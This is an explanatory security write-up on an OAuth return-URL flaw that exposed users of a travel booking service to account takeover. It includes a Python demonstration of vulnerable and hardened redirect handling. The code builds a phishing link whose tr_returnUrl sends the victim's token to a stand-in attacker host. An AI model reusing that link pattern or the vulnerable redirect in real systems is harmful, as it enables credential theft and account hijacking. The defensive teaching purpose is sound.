Introduction
A critical vulnerability was recently disclosed in Acme Travel, a widely used online service for hotel and car rentals that integrates with various commercial airline services [2] [5]. Because the service's OAuth-based login flow did not verify where it sent users' authentication credentials, millions of users were exposed to account takeover [6].
Description
A recently discovered critical vulnerability in Acme Travel [3] [4], a popular online service for hotel and car rentals that integrates with various commercial airline services [2] [5], has exposed millions of users to the risk of account takeover due to misconfigured OAuth authentication processes [6]. This flaw allowed attackers to gain unauthorized access to any user’s account [1] [2] [3] [4] [5], impersonating victims and performing actions such as booking hotels and car rentals using the victims’ airline loyalty points [2] [3] [4] [5], as well as modifying or canceling bookings [5].
The exploit hinges on the tr_returnUrl parameter in the authentication flow [2] [5], which tells the service where to send the user's credentials once login succeeds [5]. An attacker who replaces this value with a URL on a server they control receives those credentials the moment the victim authenticates with the airline service. The method is particularly insidious because the link the victim clicks points at a legitimate customer (airline) domain [2] [5]; only the return-URL parameter is malicious, so the visible host is a trusted one and detection through standard security measures is difficult [5]. The root cause is a failure to verify that sensitive authentication credentials are sent only to a legitimate domain [6], which lets attackers circulate malicious links disguised as valid airline links [6] and leads users to unknowingly authenticate against the attacker's server [6]. These links can be delivered by email, text message [2] [3], or from attacker-controlled websites [2] [3] [5].
Once attackers capture the credentials [2] [3] [5], they can log into the Acme Travel service as the victim [5], gaining access to personally identifiable information (PII) and the ability to perform unauthorized actions [5], such as modifying account details and creating orders [2]. The incident underscores the risks that come with third-party integrations and the need for robust security controls to protect users from unauthorized access and manipulation. This type of vulnerability is not uncommon; similar issues have been found at other companies [6], including Booking.com and various e-commerce platforms [6]. The vulnerability has since been fixed [3] [4]. The case also illustrates a structural risk of such integrations: the airline has little or no visibility into the attack while it is under way, because the login flow, and with it responsibility for user security, sits with the third-party service provider [6]. Open redirects [3], a known weakness for more than a decade [3], remain an ongoing issue, and this case shows why they still demand attention.
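The following is an added example in Python, not code from the page or from any vendor or researcher cited above. It models the flow described in this section: a login endpoint that takes a return URL from the request, the phishing link that abuses it, a vulnerable post-login redirect that hands the credential to whatever tr_returnUrl named, and a hardened version that matches the return URL against an allow-list after parsing and redirects only to the allow-listed string. Only the parameter name tr_returnUrl comes from the text; every hostname, endpoint path and the token format are assumptions made for the example.

```python
"""Added example: vulnerable vs. hardened handling of a post-login return URL.

Constructed scenario (assumptions, not from the page): an airline site at
airline.example hosts the travel service's login, and the only legitimate
place to send a credential after login is travel.example.com/auth/callback.
"""
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Hypothetical allow-list of callback URLs: scheme + host + path, no wildcards.
ALLOWED_RETURN_URLS = frozenset({
    "https://travel.example.com/auth/callback",
})

# Constructed: the login endpoint on the legitimate customer (airline) domain.
AIRLINE_LOGIN_URL = "https://airline.example/login"


def craft_phishing_link(attacker_collector: str) -> str:
    """The attacker's link: it points at the real airline domain, and only the
    tr_returnUrl parameter names the attacker's collector server."""
    return f"{AIRLINE_LOGIN_URL}?{urlencode({'tr_returnUrl': attacker_collector})}"


def post_login_redirect_vulnerable(request_url: str, token: str) -> str:
    """Vulnerable: the credential is sent wherever tr_returnUrl said."""
    params = parse_qs(urlsplit(request_url).query)
    return_url = params.get("tr_returnUrl", ["https://travel.example.com/auth/callback"])[0]
    sep = "&" if "?" in return_url else "?"
    return f"{return_url}{sep}{urlencode({'token': token})}"


def canonical_return_url(candidate: str) -> Optional[str]:
    """Return the allow-listed URL that `candidate` matches, or None.

    The candidate is parsed and compared on scheme, host and path only, so
    userinfo tricks (https://legit@evil), look-alike subdomains, scheme-relative
    URLs, odd ports, path suffixes and attacker-supplied query strings either
    fail the match or are discarded.
    """
    try:
        parts = urlsplit(candidate)
        port = parts.port                       # raises ValueError on junk ports
    except ValueError:
        return None
    if parts.scheme != "https" or not parts.hostname:
        return None
    if parts.username is not None or parts.password is not None:
        return None                              # https://travel.example.com@evil.example/...
    if port not in (None, 443):
        return None
    normalised = urlunsplit(("https", parts.hostname, parts.path, "", ""))
    return normalised if normalised in ALLOWED_RETURN_URLS else None


def post_login_redirect_hardened(request_url: str, token: str) -> Optional[str]:
    """Hardened: refuse unless tr_returnUrl matches the allow-list, and then
    redirect to the allow-listed string itself, never to the supplied one."""
    params = parse_qs(urlsplit(request_url).query)
    candidate = params.get("tr_returnUrl", [""])[0]
    target = canonical_return_url(candidate)
    if target is None:
        return None                              # no redirect, no credential issued
    return f"{target}?{urlencode({'token': token})}"


if __name__ == "__main__":
    link = craft_phishing_link("https://attacker.example/collect")
    print("phishing link :", link)
    print("vulnerable    :", post_login_redirect_vulnerable(link, "tok123"))
    print("hardened      :", post_login_redirect_hardened(link, "tok123"))
```

Note the last step in the hardened handler: once the candidate matches, the redirect is built from the allow-listed string, not from the request value, so anything the attacker appended (for instance a `next=` parameter aimed at an open redirect on the legitimate callback) is dropped rather than forwarded along with the token. Exact matching of pre-registered redirect URLs is also what the OAuth 2.0 security guidance requires; pattern or prefix matching is where most real-world bypasses come from.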
Conclusion
The discovery of this vulnerability in Acme Travel highlights the significant risks posed by misconfigured authentication processes, particularly in services that integrate with third-party platforms. Mitigating such vulnerabilities requires robust security controls and, specifically, ensuring that sensitive credentials are transmitted only to legitimate domains: in practice, every redirect or return URL must be validated against an allow-list of exact, pre-registered values rather than trusted as supplied in the request. The incident is a reminder of the ongoing challenges in securing online services and of the importance of addressing known weaknesses such as open redirects [3]. Since similar vulnerabilities have been identified at other companies, service providers must prioritize user security and maintain stringent measures to prevent unauthorized access and manipulation.
References
[1] https://cyber.vumetric.com/security-news/2025/01/28/oauth-redirect-flaw-in-airline-travel-integration-exposes-millions-to-account-hijacking/
[2] https://salt.security/blog/api-supply-chain-attacks—the-skys-the-limit
[3] https://ciso2ciso.com/api-supply-chain-attacks-put-millions-of-airline-users-at-risk-source-www-infosecurity-magazine-com/
[4] https://www.infosecurity-magazine.com/news/api-supply-chain-attacks-millions/
[5] https://securityboulevard.com/2025/01/api-supply-chain-attacks-the-skys-the-limit/
[6] https://www.darkreading.com/application-security/oauth-flaw-exposed-millions-airline-users-account-takeovers